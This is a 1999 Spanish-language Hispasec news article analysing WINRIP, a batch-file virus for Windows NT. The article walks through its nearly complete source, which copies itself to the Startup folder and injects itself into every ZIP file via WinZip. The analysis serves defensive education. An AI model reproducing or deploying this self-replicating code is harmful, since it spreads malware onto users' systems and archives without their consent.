• Saltar al contenido principal
  • Saltar a la barra lateral principal
  • Saltar al pie de página

Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / General / HispaSec analiza a WINRIP, un virus-BAT para NT

HispaSec analiza a WINRIP, un virus-BAT para NT

8 junio, 1999 Por Hispasec Deja un comentario

Hace unas semanas os descubríamos en primicia el primer virus para
Corel Draw. En aquel entonces muchos se asombraron de como un virus
podía programarse en un lenguaje tán básico y sencillo como Corel
Script, basado en BASIC. En esta ocasión presentamos un virus para
Windows NT que tiene la peculiaridad de infectar todos los ficheros
ZIP y, lo que más llama la atención, con tan sólo siete líneas de un
fichero de proceso por lotes.
El ensamblador es, sin duda, el lenguaje por excelencia a la hora de
crear los virus informáticos. Control, potencia y optimización tienen
cabida en este lenguaje que, sin embargo, sólo está al alcance de
desarrolladores avanzados. Tal vez sea por esta causa por lo que los
virus de macro, basado en lenguajes scripts y derivados de BASIC, han
tenido un auge tan espectacular en estos últimos tiempos, gracias a la
facilidad para su programación.

Sencillos de hacer y con facilidades para expandirse, los virus de
macro, en especial para Office, ocupan los primeros puestos en las
listas de prevalencia. Una de las últimas muestras que más repercusión
han obtenido la podemos encontrar en el virus Melissa, escrito para
Word, el procesador de textos de Microsoft. Pero no sólo del
ensamblador y los macros nacen los virus, en prácticamente todos
los lenguajes es factible implementar un programa que se replique.
Podemos encontrar muestras en C, Pascal, Java o, como en este caso, en
un simple fichero BAT. Veamos como trabaja a través de un recorrido por
su código.

En las primeras dos líneas, nos encontramos con un comando que oculta
los mensajes que se pudieran derivar de las ordenes, para no alertar
al usuario y un comentario donde se puede leer el nombre del virus y
la firma de autoría.

—–
@echo off
@echo REM WINRIP by SkamWerks Labs > winripem.bat
—–

A continuación, el virus se copia a sí mismo (winrip.bat) en el
directorio de inicio automático (startup) en las versiones inglés de
Windows NT, lo que le asegura su ejecución cada vez que se inicie la
sesión. La utilización de múltiples «\..» le permite llegar al raíz
y encontrar la ruta correcta aunque el fichero se ejecute desde una
subcarpeta con varios niveles de profundidad, como es el caso de la
carpeta de inicio de Windows.

—–
@copy winrip.bat «c:\..\..\..\..\..\..\..\winnt\profiles\default user\start menu\programs\startup\winrip.bat»
—–

En la cuarta línea se realiza un listado de ficheros en busca de la
localización del archivo winzip32.exe, que almacena en una variable
para utilizarlo posteriormente, lo que le permitirá comprimirse e
introducirse en los ficheros ZIP.

Los parámetros utilizados son:
/s para recorrer el directorio actual y subdirectorios.
/b para listar únicamente los nombres de los ficheros sin encabezados
ni información adicional que metería «basura» a la hora de procesar
los ficheros.
/l para que el listado se realice en minúsculas.

—–
@dir /s /b /l c:\winzip32.exe | set wz=
—–

A continuación, el virus recorre con un bucle el directorio, de manera
similar a la anterior línea, pero en busca de los ficheros con extensión
ZIP. Simultaneamente crea un archivo de proceso por lotes (winripem.bat)
donde añade (>>) una línea por cada fichero a infectar.

Esa línea hace referencia al archivo winzip32.exe cuya trayectoria
almacenó en la variable («%wz%»). Gracias a él, podrá introducir el
archivo winrip.bat (que contiene el virus) de la carpeta de inicio
(startup), en cada uno de los ficheros ZIP que recorre. Los parámetros
utilizados en winzip32 son:
-min para realizar la compresión en modo rápido
-a que le indica que la acción es la de comprimir el fichero y añadirlo.
-r utiliza carpetas recursivas a la hora de buscar los ficheros.
-p guarda información extra de las carpetas, de nuevo se asegura que
cuando sea descomprimido se situará en la carpeta startup para
ejecutarse en cada inicio de sesión.

—–
@FOR /F «delims==» %%y IN (‘dir /s /b /l c:\*.zip’) DO @echo «%wz%» -min -a -r -p «%%y» «c:\..\..\..\..\..\..\..\winnt\profiles\default user\start menu\programs\startup\winrip.bat» >> winripem.bat
—–

Llama y ejecuta el fichero anteriormente creado, winripem.bat, lo que
provocará que se ejecuten todas y cada una de las líneas que creó,
y por tanto, infecte todos los ficheros ZIP, introduciendose en ellos.
Por último, borra este fichero.

—–
@call winripem.bat
@del winripem.bat
—–

El virus no realiza ninguna acción dañina directa, aunque con tan
sólo introducir una línea más en su código podría acarrear perdidas
importantes. Su capacidad de reproducción es bastante elevada, teniendo
en cuenta que se trata de un virus muy simple de proceso por lotes que
necesita la utilidad de compresión WINZIP32 para poder infectar.
Podemos catalogarlo dentro de los virus de bajo riesgo, y su interés
radica en su simpleza, que deja patente que los virus se nos pueden
presentar en multitud de formas y contenidos diferentes.

Bernardo Quintero

Acerca de Hispasec

Hispasec Ha escrito 6939 publicaciones.

  • View all posts by Hispasec →
  • Blog

Compártelo:

  • Twitter
  • Facebook
  • LinkedIn
  • Reddit
  • Telegram
  • WhatsApp

Publicaciones relacionadas

Publicado en: General

Interacciones con los lectores

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Barra lateral principal

Buscar

Síguenos

siguenos en twitter

UAD360 EDICIÓN 2022

https://www.youtube.com/watch?v=go_CSWK56yU

Populares de UAD

  • Vulnerabilidad zero-day en AWS Glue
  • Tamagotchi para hackers: Flipper Zero
  • Campañas de phishing utilizan Flipper Zero como cebo
  • Evasión de CloudTrail en AWS a través de API no documentada
  • Parches de enero 2023: Microsoft corrige 98 vulnerabilidades

Entradas recientes

  • Vulnerabilidad zero-day en AWS Glue
  • Evasión de CloudTrail en AWS a través de API no documentada
  • Parches de enero 2023: Microsoft corrige 98 vulnerabilidades
  • UAD se abre a la comunidad
  • Campañas de phishing utilizan Flipper Zero como cebo
  • Vulnerabilidades críticas en productos de Synology
  • Más de dos docenas de errores de WordPress explotados por un nuevo malware de Linux
  • Correo electrónico
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Footer

UAD

UAD nació a raíz de un inocente comentario en un canal IRC hace 24 años. A través de los archivos, un lector curioso puede ver cómo ha cambiado (o no) la seguridad de la información desde entonces.

Aviso Legal

  • Aviso Legal
  • Términos y Condiciones
  • Política de Privacidad
  • Política de Cookies

Copyright © 2023 · Hispasec Sistemas, S.L. Todos los derechos reservados

Este sitio web utiliza cookies propias y de terceros para fines analíticos y para mostrarte publicidad (tanto general como personalizada) relacionada con tus preferencias en base a un perfil elaborado a partir de tus hábitos de navegación (por ejemplo, páginas visitadas), para optimizar la web y para poder valorar las opiniones de los servicios consultados por los usuarios. Para administrar o deshabilitar estas cookies haz clic en: Configurar Cookies


Rechazar todo Aceptar Todo
Configurar Cookies

Resumen de privacidad

Este sitio web utiliza cookies para mejorar su experiencia mientras navega por el sitio web. De estas, las cookies que se clasifican como necesarias se almacenan en su navegador, ya que son esenciales para el funcionamiento de las funcionalidades básicas del sitio web. También utilizamos cookies de terceros que nos ayudan a analizar y comprender cómo utiliza este sitio web. Estas cookies se almacenarán en su navegador solo con su consentimiento. También tiene la opción de optar por no recibir estas cookies. Pero la exclusión voluntaria de algunas de estas cookies puede afectar su experiencia de navegación.
Necesaria
Siempre activado
Las cookies necesarias son absolutamente esenciales para que el sitio web funcione correctamente. Estas cookies garantizan funcionalidades básicas y características de seguridad del sitio web, de forma anónima.
CookieDuraciónDescripción
cookielawinfo-checkbox-analytics11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Análisis".
cookielawinfo-checkbox-functional11 monthsLa cookie está configurada por el consentimiento de cookies de GDPR para registrar el consentimiento del usuario para las cookies en la categoría "Funcional".
cookielawinfo-checkbox-necessary11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. Las cookies se utilizan para almacenar el consentimiento del usuario para las cookies en la categoría "Necesario".
cookielawinfo-checkbox-others11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Otro.
cookielawinfo-checkbox-performance11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Rendimiento".
viewed_cookie_policy11 monthsLa cookie está configurada por el complemento de consentimiento de cookies de GDPR y se utiliza para almacenar si el usuario ha dado su consentimiento o no para el uso de cookies. No almacena ningún dato personal.
Analítica
Las cookies analíticas se utilizan para comprender cómo interactúan los visitantes con el sitio web. Estas cookies ayudan a proporcionar información sobre métricas, el número de visitantes, la tasa de rebote, la fuente de tráfico, etc.
GUARDAR Y ACEPTAR